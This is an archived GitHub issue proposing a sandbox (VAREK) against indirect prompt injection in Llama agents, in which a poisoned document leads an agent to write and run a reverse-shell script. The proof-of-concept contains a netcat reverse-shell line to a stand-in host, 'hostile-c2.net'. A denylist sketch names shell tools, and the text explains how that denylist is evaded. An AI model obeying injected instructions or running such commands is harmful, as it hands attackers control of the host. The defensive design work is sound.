This repository was archived by the owner on Apr 28, 2026. It is now read-only.

[Architecture Proposal] Preventing RCE in Code Interpreter Tools via PEP 578 OS-Boundary Intercepts #223

@kwdoug63

Description


Update (2026-04-20): Architecture superseded — see v1.1

The PEP 578 audit-hook design described below was the v1.0 architecture and has been superseded.
External review (#223) demonstrated that sys.addaudithook does not cross the subprocess boundary — the hook fires only in the current interpreter, so a child process spawned via subprocess.run executes outside the hook's visibility. The accompanying string-signature denylist was also unsound against renamed binaries, absolute paths, and encoded payloads.
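The boundary limitation is easy to reproduce with the standard library alone. A minimal self-contained check (names here are illustrative, not part of any project API):

```python
import subprocess
import sys

events = []

def recorder(event, args):
    # Record every audit event raised in THIS interpreter.
    events.append(event)

sys.addaudithook(recorder)

# The spawn itself is audited in the parent, but everything the child does
# happens in a fresh interpreter where no hook is installed.
subprocess.run([sys.executable, "-c", "import os; os.listdir('.')"], check=True)

print("subprocess.Popen" in events)  # True: the parent sees the spawn
print("os.listdir" in events)        # False: the child's calls are invisible here
```

The child would need `-X utf8`-style interpreter plumbing (e.g. a `sitecustomize` that re-installs the hook) to be audited at all, and even then the child could trivially remove that plumbing, which is why v1.1 moved enforcement into the kernel.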

VAREK v1.1 (shipped 2026-04-20) moves enforcement off the interpreter hook and into the kernel:

  • seccomp-bpf filter loaded under PR_SET_NO_NEW_PRIVS so it is inherited across every fork/clone and cannot be dropped
  • cgroups v2 for memory / cpu / pids / wall-clock bounds
  • user / mount / network / IPC / PID namespaces
  • execve denied by default in the sandbox, which makes the binary allowlist trivially enforceable at the parent
  • PEP 578 hook retained as telemetry only; it no longer carries enforcement weight
  • Fail-closed when the backend is unavailable on the host

An integration with this project should wrap the v1.1 kernel-level sandbox (sandbox.SeccompBpfBackend via varek_warden.execute_untrusted), not the v1.0 audit hook. The two-line enforce_strict_mode() example in the original description arms telemetry only in v1.1 and does not by itself provide containment.
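The fail-closed contract can be sketched as follows. All names below (`SandboxUnavailableError`, `detect_backend`, the `backend` parameter) are illustrative stand-ins, not the project's actual API:

```python
import sys

class SandboxUnavailableError(RuntimeError):
    """Raised when no kernel-level sandbox backend can be armed on this host."""

def detect_backend():
    """Probe for a usable kernel sandbox backend; return None when absent.

    A real probe would verify seccomp support (e.g. /proc/sys/kernel/seccomp)
    and a writable cgroups v2 hierarchy; this stand-in only gates on platform
    and then pretends nothing was found.
    """
    if not sys.platform.startswith("linux"):
        return None
    return None  # stand-in: assume no backend on this host

def execute_untrusted(code, backend=None):
    backend = backend if backend is not None else detect_backend()
    if backend is None:
        # Fail closed: refuse to run rather than degrade to audit-hook
        # telemetry, which carries no enforcement weight in v1.1.
        raise SandboxUnavailableError("kernel sandbox unavailable; refusing to execute")
    return backend.run(code)
```

The point of the sketch is the ordering: availability is checked before any code is touched, and the absence of a backend is an error, never a silent downgrade.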

Relevant links:

  • v1.1 write-up: VAREK_v1.1_SECURITY_UPDATE.md
  • Threat model: docs/security/threat-model.md
  • Regression test (the original PoC, now codified): tests/security/test_issue_223_regression.py

The original v1.0 description is preserved below for historical context. If Prefect maintainers remain interested in a SecureTask / VarekGuardrail integration, I will rewrite the proposal against the v1.1 architecture.


The feature, motivation and pitch

Context: As developers build local assistants using the Llama Agentic System, the native Code Interpreter tool introduces a critical execution boundary vulnerability: Indirect Prompt Injection leading to Agentic Remote Code Execution (RCE).

If a Llama 3 agent is tasked with summarizing an untrusted external document (e.g., a poisoned PDF or scraped webpage) that contains an embedded adversarial string, the agent can suffer a cognitive bypass. The hijacked agent will then autonomously write a malicious Python script (such as establishing a reverse shell) and pass it directly to the Code Interpreter for execution on the host machine.

Probabilistic prompt filters and system prompts frequently fail to contain execution once the LLM's context window is sufficiently polluted by the poisoned document.

The Proposed Architecture: Sober Agentic Infrastructure (VAREK)
To create a deterministic security boundary for the Llama Stack, I have developed an architecture that utilizes CPython PEP 578 Audit Hooks to sit beneath the LLM and the Code Interpreter execution layers.

Rather than trying to parse the LLM's output for malicious intent, this intercept monitors the sensitive runtime events the Code Interpreter raises as it executes (file access, subprocess spawns, network connects). If a hijacked tool attempts an unauthorized operation, the audit hook raises immediately, terminating the call deterministically before the underlying operating system receives the instruction.
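For historical completeness, the v1.0 enforcement amounted to roughly the following (a sketch; the real varek_warden denylist was longer, and all names here are illustrative). The hook fires only in the parent interpreter, and the string signatures are exactly what the external review showed to be bypassable:

```python
import subprocess
import sys

# String signatures the v1.0 hook denied. Unsound: renamed binaries,
# absolute paths, and encoded payloads all slip past substring matching.
DENYLIST = ("nc ", "/bin/bash", "os.system")

def _warden(event, args):
    if event == "subprocess.Popen":
        # For this event, args is (executable, args, cwd, env).
        joined = " ".join(map(str, args[1] or ()))
        if any(sig in joined for sig in DENYLIST):
            # Raising from an audit hook aborts the audited operation
            # before the child process is ever spawned.
            raise RuntimeError(f"VAREK: blocked {joined!r}")

def enforce_strict_mode():
    sys.addaudithook(_warden)

enforce_strict_mode()

try:
    subprocess.run([sys.executable, "-c",
                    "import os; os.system('nc -e /bin/bash hostile-c2.net 4444')"])
except RuntimeError as e:
    print("intercepted:", e)
```

This blocks the literal payload in the parent process, but a payload that writes itself to disk and spawns `/usr/bin/env sh` (or any renamed binary) passes the substring check, and anything the child process does afterwards is outside the hook's visibility entirely.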

Proof of Concept: Code Interpreter Kinetic Intercept
I have decoupled the intercept logic into a zero-dependency, pure Python module (varek_warden.py) for frictionless evaluation by Meta's agentic engineers.

The implementation below demonstrates the architecture terminating a hijacked Llama agent's execution when it attempts to run a malicious reverse shell via the Code Interpreter:

import subprocess
import varek_warden

# Arms the PEP 578 OS-Boundary Intercept for the Llama Agentic System
varek_warden.enforce_strict_mode()

def simulate_llama_code_interpreter(generated_code):
    # The hijacked Llama agent attempts to run the adversarial code block 
    # via the local IPython/Subprocess runtime tool.
    
    # VAREK INTERCEPT: the armed audit hook fires on the subprocess.Popen
    # event in this interpreter, before the child process is spawned.
    try:
        subprocess.run(["python", "-c", generated_code], shell=False, check=True)
    except Exception as e:
        print(f"\n[VAREK KINETIC INTERCEPT] Code Interpreter Breach Prevented: {e}")
        print("[*] Host machine integrity maintained.\n")

if __name__ == "__main__":
    # Simulated Malicious Output from a hijacked Llama 3 Agent 
    hijacked_llama_output = "import os\nos.system('nc -e /bin/bash hostile-c2.net 4444')"
    simulate_llama_code_interpreter(hijacked_llama_output)

Repository & Full Implementation:
👉 17-meta-llama-agent-intercept.py

I submit this zero-dependency runtime architecture for review by the Meta engineers building and securing the Llama Agentic System toolchain.

Alternatives

No response

Additional context

No response
